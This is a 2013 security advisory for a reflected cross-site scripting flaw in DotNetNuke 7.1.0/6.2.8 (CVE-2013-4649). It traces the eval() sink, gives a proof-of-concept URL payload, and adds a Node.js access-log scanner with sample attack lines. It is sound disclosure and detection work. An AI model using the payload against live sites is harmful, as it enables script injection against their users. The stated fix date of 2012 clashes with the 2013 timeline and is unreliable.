packetstorm | Sajjad Pourali | PACKETSTORM:122792
History: Aug 13, 2013 - 12:00 a.m.

DotNetNuke (DNN) 7.1.0 / 6.2.8 Cross Site Scripting

2013-08-13 00:00:00
Sajjad Pourali
packetstormsecurity.com

EPSS: 0.002 (percentile: 64.9%)

`Title: DotNetNuke (DNN) Cross-Site Scripting Vulnerability  
References: CVE-2013-4649  
Discovered by: Sajjad Pourali, Nasser Salim Al-Hadhrami  
  
Vendor: http://dnnsoftware.com/  
Vendor advisory: http://www.dnnsoftware.com/Platform/Manage/Security-Bulletins (2013-07)  
Vendor contact: 2013-06-23  
Vendor response: 2013-06-24 (Cathal Connolly from DotNetNuke)  
Vendor fix and announcement: 2012-08-14  
  
Solution: Update to 6.2.9 / 7.1.1  
  
Remote: yes  
Authentication required: no  
User interaction required: yes  
Impact: Medium  
  
Affected:  
  
- DNN 7.1.0 and earlier  
- DNN 6.2.8 and earlier  
  
Not affected:  
- DNN 7.1.1  
- DNN 6.2.9  
  
---  
  
Tracing the vulnerable code path:  
  
http://www.vulnerable.com/?__dnnVariable={'__dnn_pageload':'alert(/XSS/)'} :   
  
...  
  
<input name="__dnnVariable" type="hidden" id="__dnnVariable" autocomplete="off" value="`{`__dnn_pageload`:`alert(/XSS/)`,`__scdoff`:`1`}" />  
  
...  
  
  
http://www.vulnerable.com/js/dnn.js :   
  
...  
  
Type.registerNamespace("dnn");  
  
...  
  
http://www.vulnerable.com/js/dnncore.js :   
  
...  
  
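function __dnn_ClientAPIEnabled()  
{  
    return typeof (dnn) != "undefined"  
}  
  
...  
  
    if (__dnn_ClientAPIEnabled())  
    {  
        // __dnn_pageload is read from the __dnnVariable hidden field shown above  
        var sLoadHandlers = dnn.getVar("__dnn_pageload");  
        if (sLoadHandlers != null)  
        {  
            // sink: the request-supplied string is executed as script  
            eval(sLoadHandlers)  
        }  
        dnn.dom.attachEvent(window, "onscroll", __dnn_bodyscroll)  
    }  
    __dnn_m_bPageLoaded = true  
}  // closes the enclosing function, whose opening is elided above  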
  
...  
  
---  
  
PoC:  
  
http://www.vulnerable.com/?__dnnVariable={'__dnn_pageload':'alert(/XSS/)'}   
  
---  
  
+ Sajjad Pourali  
+ http://www.securation.com/  
+ http://www.cert.um.ac.ir/  
+ Contact: sajjad[at]securation.com  
`
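
An added example, not code from the advisory or from DNN: a Node.js scan of web access logs for the request shape shown in the PoC above, that is, a query string that supplies `__dnnVariable` with a `__dnn_pageload` entry, to check whether sites still on 7.1.0 / 6.2.8 received such links. Assumptions: combined-log-format lines (adapt the regular expression for IIS W3C logs), case-insensitive matching of the parameter name, illustrative function names, and constructed sample lines.

```javascript
// Added example (not DNN or advisory code): find requests whose query string
// supplies __dnnVariable with a __dnn_pageload entry.
const PARAM = "__dnnvariable"; // compared case-insensitively (assumption)
const SINK = "__dnn_pageload"; // key whose value dnncore.js passes to eval()

// Percent-decode one component; malformed escapes fall back to the raw text.
function decode(s) {
  try { return decodeURIComponent(s.replace(/\+/g, " ")); }
  catch (e) { return s; }
}

// Return the supplied __dnnVariable value if it names __dnn_pageload, else null.
function findPageloadOverride(target) {
  const q = target.indexOf("?");
  if (q < 0) return null;
  for (const pair of target.slice(q + 1).split("#")[0].split("&")) {
    const eq = pair.indexOf("=");
    const name = decode(eq < 0 ? pair : pair.slice(0, eq)).toLowerCase();
    if (name !== PARAM) continue;
    const value = decode(eq < 0 ? "" : pair.slice(eq + 1));
    // Conservative: match the key name in any letter case.
    if (value.toLowerCase().includes(SINK)) return value;
  }
  return null;
}

// Scan combined-log-format lines; return one record per flagged request.
function scanAccessLog(lines) {
  const hits = [];
  lines.forEach((line, i) => {
    const m = /"[A-Z]+ (\S+) HTTP\/[\d.]+"/.exec(line);
    const value = m ? findPageloadOverride(m[1]) : null;
    if (value !== null) hits.push({ lineNo: i + 1, client: line.split(" ")[0], value });
  });
  return hits;
}

// Constructed sample log lines (documentation IP ranges), not real traffic.
const SAMPLE_LOG = [
  '203.0.113.7 - - [13/Aug/2013:10:00:01 +0000] "GET /?__dnnVariable={%27__dnn_pageload%27:%27alert(/XSS/)%27} HTTP/1.1" 200 5120',
  '203.0.113.7 - - [13/Aug/2013:10:00:05 +0000] "GET /Home.aspx?tabid=55 HTTP/1.1" 200 4096',
  '198.51.100.9 - - [13/Aug/2013:10:01:12 +0000] "GET /default.aspx?__DNNVARIABLE=%7B%27__dnn_pageload%27%3A%27handler()%27%7D HTTP/1.1" 200 5120',
  '198.51.100.9 - - [13/Aug/2013:10:02:00 +0000] "GET /?__dnnVariable={%27__scdoff%27:%271%27} HTTP/1.1" 200 5120',
];

console.log(scanAccessLog(SAMPLE_LOG));
```

The scan covers query strings only; a `__dnnVariable` field in a POST body is not visible in access logs and needs request-body logging to inspect.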
